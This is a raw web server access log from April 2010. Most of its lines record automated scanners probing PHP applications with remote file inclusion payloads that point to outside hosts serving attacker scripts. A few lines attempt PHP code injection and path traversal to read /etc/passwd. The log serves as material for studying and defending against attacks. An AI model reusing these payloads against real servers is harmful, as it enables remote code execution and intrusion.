74.200.89.25 - - [16/Apr/2010:01:58:35 -0400] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:58:35 -0400] "GET /logs/access_log.Q110040100%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:58:37 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:58:37 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:59:45 -0400] "GET /logs/access_log.Q109100200%20%20//////////com_uhp/uhp_config.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
78.110.50.121 - - [16/Apr/2010:02:00:19 -0400] "GET //component/page,shop.ask/flypage,flypage.tpl/product_id,5/category_id,2/option,com_virtuemart/Itemid,12//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.kadiningucu.org//components/com_fabrik/libs/Blowfish/com_null/test.txt???? HTTP/1.1" 404 353 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
78.110.50.121 - - [16/Apr/2010:02:00:19 -0400] "GET /logs//component/page,shop.ask/flypage,flypage.tpl/product_id,5/category_id,2/option,com_virtuemart/Itemid,12//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.kadiningucu.org//components/com_fabrik/libs/Blowfish/com_null/test.txt???? HTTP/1.1" 404 358 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
222.236.47.182 - - [16/Apr/2010:02:00:32 -0400] "GET /logs//com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:02:00:37 -0400] "GET //com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:01:24 -0400] "GET /logs//ashnews.php?pathtoashnews=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:01:24 -0400] "GET /logs/access_log.Q109061000//ashnews.php?pathtoashnews=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:01:24 -0400] "GET //ashnews.php?pathtoashnews=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:01:38 -0400] "GET //ashnews.php?pathtoashnews=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:01:38 -0400] "GET /logs//ashnews.php?pathtoashnews=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:01:38 -0400] "GET /logs/access_log.Q109061000//ashnews.php?pathtoashnews=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:01:57 -0400] "GET /logs/error_log.Q110040400//ashnews.php?pathtoashnews=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:02:02 -0400] "GET /logs/error_log.Q110040400//ashnews.php?pathtoashnews=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:02:02:03 -0400] "GET /logs/access_log.Q110040100//bbs//skin/zero_vote/ask_password.php?dir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:02:02:42 -0400] "GET /logs/access_log.Q110040100//bbs//skin/zero_vote/ask_password.php?dir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:02:57 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:02:57 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:02:57 -0400] "GET /logs/access_log.Q109061800%20%20//modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:03:08 -0400] "GET /logs/error_log.Q109122900%20%20//modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:03:21 -0400] "GET /logs/access_log.Q109061800%20%20//modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:03:21 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:03:21 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:02:03:24 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L12170B564FA41500F660092+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.78.238.157 - - [16/Apr/2010:02:03:25 -0400] "GET /logs/error_log.Q109122900%20%20//modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:02:05:40 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
119.235.18.119 - - [16/Apr/2010:02:05:59 -0400] "GET /logs/access_log.Q109112600///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
119.235.18.119 - - [16/Apr/2010:02:06:02 -0400] "GET ///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
209.59.12.99 - - [16/Apr/2010:02:06:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.114.252 - - [16/Apr/2010:02:05:40 -0400] "GET /logs/access_log.Q109081900 HTTP/1.0" 200 4260094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
119.235.18.119 - - [16/Apr/2010:02:06:04 -0400] "GET /logs///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
200.78.238.157 - - [16/Apr/2010:02:06:06 -0400] "GET //shoutbox/expanded.php?conf=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:06:06 -0400] "GET /logs//shoutbox/expanded.php?conf=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:06:06 -0400] "GET /logs/access_log.Q110022500//shoutbox/expanded.php?conf=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:06:12 -0400] "GET /logs/error_log.Q109101400//shoutbox/expanded.php?conf=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:02:06:45 -0400] "GET /logs/access_log.Q109071600////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:02:06:42 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):03+RNCLAS(S0040):9+RNSUBS%20(S0040):0 HTTP/1.0" 200 62776 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.236.47.182 - - [16/Apr/2010:02:08:26 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:02:08:26 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:02:08:26 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:02:08:24 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L40675E3C21725100C462009+WSEQ(S0060):1+OUITEM(A0200):0034215 HTTP/1.1" 200 27010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.236.47.182 - - [16/Apr/2010:02:08:39 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:02:08:39 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:02:08:39 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:02:09:05 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L12170B564F545500F460092+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.241.251.224 - - [16/Apr/2010:02:09:32 -0400] "GET /logs/access_log.Q110022300////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:02:10:09 -0400] "GET /logs/access_log.Q109100200%20%20//////////com_uhp/uhp_config.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
119.235.18.119 - - [16/Apr/2010:02:10:16 -0400] "GET /logs/error_log.Q109100100///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
200.78.238.157 - - [16/Apr/2010:02:11:16 -0400] "GET /logs/access_log.Q109061800//modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:11:21 -0400] "GET /logs/error_log.Q109122900//modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:02:11:22 -0400] "GET /logs/access_log.Q109060300 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
79.98.23.9 - - [16/Apr/2010:02:13:01 -0400] "GET //com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:02:13:10 -0400] "GET /logs/access_log.Q110021200%20%20//com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:02:13:10 -0400] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:02:13:16 -0400] "GET /logs/error_log.Q109092400%20%20//com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:02:13:27 -0400] "GET /logs/access_log.Q109100200%20%20//com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:02:14:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
79.98.23.9 - - [16/Apr/2010:02:14:24 -0400] "GET /logs/access_log.Q110022700%20%20//com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:02:14:45 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LA28B6B5C72962000F63302X+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
118.129.170.49 - - [16/Apr/2010:02:15:19 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:15:19 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:15:19 -0400] "GET /logs/access_log.Q109070500//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:15:19 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:15:19 -0400] "GET /logs/access_log.Q109070500//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:15:19 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:15:37 -0400] "GET /logs/error_log.Q109070500//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:15:40 -0400] "GET /logs/error_log.Q109070500//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:16:23 -0400] "GET /logs/access_log.Q109062900%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:16:23 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:16:23 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:16:32 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:16:38 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:16:39 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:16:39 -0400] "GET /logs/access_log.Q109060200//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:16:39 -0400] "GET /logs/access_log.Q109052200//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:16:42 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:16:42 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:16:42 -0400] "GET /logs/error_log.Q110033100%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:16:48 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:16:48 -0400] "GET /logs/error_log.Q110033100%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:16:48 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:16:53 -0400] "GET /logs/access_log.Q109062900%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:16:53 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:17:06 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:17:06 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:02:17:16 -0400] "GET /logs/access_log.Q109060100//////////com_uhp/uhp_config.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:18:44 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:18:44 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:18:44 -0400] "GET /logs/error_log.Q109052200//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:18:56 -0400] "GET /logs/error_log.Q109052200//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:18:56 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:18:56 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
78.110.50.121 - - [16/Apr/2010:02:19:31 -0400] "GET /logs/access_log.Q109071600//mambots/content/multithumb/slimbox/css///components/com_sef/sef.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/AinuLid1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
78.110.50.121 - - [16/Apr/2010:02:19:31 -0400] "GET //mambots/content/multithumb/slimbox/css///components/com_sef/sef.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/AinuLid1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
78.110.50.121 - - [16/Apr/2010:02:19:32 -0400] "GET /logs//mambots/content/multithumb/slimbox/css///components/com_sef/sef.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/AinuLid1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
78.110.50.121 - - [16/Apr/2010:02:19:32 -0400] "GET /logs/access_log.Q109062800//mambots/content/multithumb/slimbox/css///components/com_sef/sef.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/AinuLid1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:20:08 -0400] "GET /logs/error_log.Q109072800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:02:20:10 -0400] "GET /logs/access_log.Q109072800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:02:20:25 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LA28B6B5C7226A000F03302X+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.236.47.182 - - [16/Apr/2010:02:21:17 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:02:21:17 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:02:21:17 -0400] "GET /logs/access_log.Q109072800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:02:21:53 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:02:21:53 -0400] "GET /logs/access_log.Q109053000%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:02:21:53 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:02:22:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.210.68.43 - - [16/Apr/2010:02:22:04 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hackclub.com.ar/tools/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
206.210.68.43 - - [16/Apr/2010:02:22:04 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hackclub.com.ar/tools/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
206.210.68.43 - - [16/Apr/2010:02:22:04 -0400] "GET /logs/access_log.Q110021200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hackclub.com.ar/tools/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
206.210.68.43 - - [16/Apr/2010:02:22:16 -0400] "GET /logs/error_log.Q109092400%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hackclub.com.ar/tools/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
206.210.68.43 - - [16/Apr/2010:02:22:22 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hackclub.com.ar/tools/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
206.210.68.43 - - [16/Apr/2010:02:22:22 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hackclub.com.ar/tools/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
206.210.68.43 - - [16/Apr/2010:02:22:22 -0400] "GET /logs/access_log.Q110021200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hackclub.com.ar/tools/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
206.210.68.43 - - [16/Apr/2010:02:22:25 -0400] "GET /logs/access_log.Q109100200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hackclub.com.ar/tools/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
206.210.68.43 - - [16/Apr/2010:02:22:27 -0400] "GET /logs/error_log.Q109092400%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hackclub.com.ar/tools/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
